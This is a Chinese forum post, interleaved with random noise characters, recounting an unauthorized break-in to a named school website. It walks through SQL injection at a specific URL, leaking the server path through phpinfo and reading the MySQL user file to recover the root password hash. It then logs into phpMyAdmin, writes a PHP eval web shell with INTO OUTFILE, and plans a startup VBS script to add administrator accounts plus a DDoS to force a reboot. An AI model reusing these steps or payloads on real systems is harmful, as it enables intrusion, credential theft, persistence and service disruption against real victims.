第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏' |' i; { g2 k( ?' k+ d' `
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!& t$ k& s2 k6 o; c# M& ^
& u( m3 p- V" {- Y# {% c' p9 d, k ^2 p' `
( m# C! s$ Y! K2 n常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 $ q' U# e2 L1 w% C+ m5 u- |
( Y0 H2 @& y4 a0 T: K: U2 s( a7 G
那么想可以直接写入shell ,getshell有几个条件:
$ Q" A8 }5 b' _( f1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
$ L5 @. }5 S3 _8 G4 @ ?+ p% a3 k& X: c9 j! L
试着爆绝对路径: % @# K% v" r% [# F+ q
1./phpMyAdmin/index.php?lang[]=1
- A' t4 i9 j% w: x4 M/ T2./phpMyAdmin/phpinfo.php " h& S! R$ R2 |. b2 H
3./load_file() 3 M, b$ u2 u+ n x, Z' [1 D
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
, h! I' Q: F; K# G) w. x2 C, l5./phpmyadmin/libraries/select_lang.lib.php $ l& T! s# r) b0 U; z
6./phpmyadmin/libraries/lect_lang.lib.php 4 S# K6 J& B' L) Z {
7./phpmyadmin/libraries/mcrypt.lib.php
# t8 T" P0 I( D# z- z; i8./phpmyadmin/libraries/export/xls.php - W; p( E/ }4 G) t
, l4 o* |; {6 e& n6 E3 p均不行...........................
% P3 N' K5 M+ [1 A, x
/ \5 n X' [: U$ u$ O( W御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php # s) L* P4 @9 b" [, i' E
# B) {* [ t. T+ m
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
$ N5 v* R7 y) I$ d2 K
' j$ M" r( l5 @1 {0 U: a默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ! N" Z8 ~! F# v* @$ Q6 v9 S
# _3 q4 P b. d V, i
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 2 T$ U9 }* Y3 A" ~
6 F4 E' r8 c- }+ d
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell . ?$ _2 |5 e; r4 r; u/ I, Y9 t) r
3 y0 J, N5 W6 M% b% q, j
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
0 D5 Z( l! ~3 n/ U& s
. r q6 Y0 x4 D4 Q+ J; M自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 n% N. C% f' U/ M& E4 J/ a$ i
" M }+ {& _3 @. K' S$ M成功读到root密码:
6 _4 j+ |9 K* C l9 |
w# d, o9 D% m1 U) ^17---- r(0072) & f: [! o( r, `# q& G$ S
18---- o(006f)
2 V7 s! H. H. D$ Q19---- o(006f) ) |( h1 A9 n* T5 x
20---- t(0074)
7 V; F8 _; s$ l9 ~) J21---- *(002a) ! I! c% E$ `1 z1 L
22---- 8(0038) " k9 L6 G# [/ F4 V x
23---- 2(0032) 4 {2 ]3 w. Q' _2 ~) y3 Y
24---- E(0045)
. m6 m1 U; R* d5 Z* B25---- 1(0031) & U; P' w* S; |6 j2 E
26---- C(0043) # c( R0 [/ T' s1 o, {
27---- 5(0035) " \7 I& t6 i* u# e2 u7 {, v' I' k
28---- 8(0038) 9 {5 t- E; o6 m' l; W
29---- 2(0032) B5 [: o5 K/ i+ s4 D& ]- S$ H
30---- 8(0038)
/ B* L+ M/ H# L6 N31---- A(0041)
0 L! z8 z! B, z" c& ?8 T2 n32---- 9(0039)
- V& L. f+ Q7 @% Z33---- B(0042)
) u- p! c8 ~3 }" ]. V' g# t, p. y7 u' q$ J34---- 5(0035) ; B. G7 m% A! x% ]8 _' {2 ^) `
35---- 4(0034)
* k4 |! f$ i1 d, d1 k4 J4 N' Q36---- 8(0038)
1 O7 O0 H4 b0 N- [1 X$ b3 A37---- 6(0036)
- t0 J' o& p1 ]0 q38---- 4(0034) ) ^% Q4 ]1 [ X4 p, |) A( G! d- h/ L
39---- 9(0039)
% ]2 u6 ]5 @9 o! O+ r40---- 1(0031)
0 n' c; h$ ]7 r$ U0 Q2 k41---- 1(0031)
8 Y! e$ O: b6 h R6 @) _: W+ E42---- 5(0035)
* Z0 Y' \( B# A6 k/ Q! i. n, |% z) p43---- 3(0033)
9 w9 _9 l' J$ E6 y* m44---- 5(0035)
% A1 f& ^6 Q6 D# e4 s9 `( o+ H( Y45---- 9(0039)
- M/ B& b$ Y( U/ ?46---- 8(0038) r5 ~: Z* o; n- s
47---- F(0046) 0 y8 c6 b) a! ?) k& T6 M
48---- F(0046)
( n: a' u" c, V, o; f3 H49---- 4(0034)
( U3 g, m+ Q# N50---- F(0046)
& N. j" L5 y5 `51---- 0(0030) # g) @% r* c# b1 O# E f& f
52---- 3(0033)
2 Q- u/ m- ], x7 `& ? c3 ?53---- 2(0032) : f+ d8 Q& `- D' ?
54---- A(0041) $ I. p* x- s3 z
55---- 4(0034)
5 {. h& g5 [; s( Y9 ^56---- A(0041) ( j0 ^" b; p( j" M$ P
57---- B(0042)
' T8 o( Q. X* p58---- *(0044) - ?' x$ W2 _+ z; t& F
59---- *(0035)
3 \, f" ^% K2 q7 R2 r' e8 q4 K60---- *(0041)
) H9 J) z" I2 h8 R, v2 m* ]3 w/ x+ x61---- *0032) ' Y N. s# J& }! t0 W7 }
+ w" X/ n( @7 _. z) U: E$ J# i3 J
解密后成功登陆phpmyamin
( r1 Q2 F1 l% `0 a
/ T. r+ ~/ s/ O. X& R% w0 A% t: Z6 k. C
2 K' s4 Z+ ^; \ q1 B# X _5 v( I# U; s9 [
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
8 o2 t! H$ e, M6 t0 z- Y4 |3 [' S5 Q( P; }7 \* [$ |! ]8 @
成功执行,拿下shell,菜刀连接:
+ t; h( `7 ~+ q _- O8 S$ h0 ]7 p7 G ^. m! v3 T' `) a
服务器不支持asp,aspx,php提权无果...................
. n2 K k: o. [) }, H" l8 \8 R1 s& Q* N. Z
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ( G* }& Z9 X5 M
服务器上已经有个隐藏帐号了
9 |' l: e9 L7 i6 m8 A别名 administrators
6 { a7 r9 \) V2 z7 ~, i注释 管理员对计算机/域有不受限制的完全访问权
8 `; S+ x2 Y* o; D) N& R成员
, J% ?1 m2 Z2 u-------------------------------------------------------------------------------
4 i2 M/ Q. b( k# h" oadmin
4 K, ^+ }& R$ w# q" l5 Y" tAdministrator$ _( i9 T$ ]# l6 R* c0 D0 P
slipper$$ [7 l! n3 _5 I1 Q, @5 Y" \5 c
sqluser
* w% e! ~0 E# `# O; m命令成功完成。
/ u, t) {% T- y) u" u
* @: `1 |" l7 L9 p+ P服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。- ~9 T9 j8 x7 X& s* ^3 L
" d* T3 V# \5 V! H" cddos服务器重启,不然就只能坐等服务器重启了...............................2 `% u8 i$ O: d& E, E6 o- R
# H/ @& Q7 r2 t" z x
1 v9 K( J$ o. [! I4 k) M
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
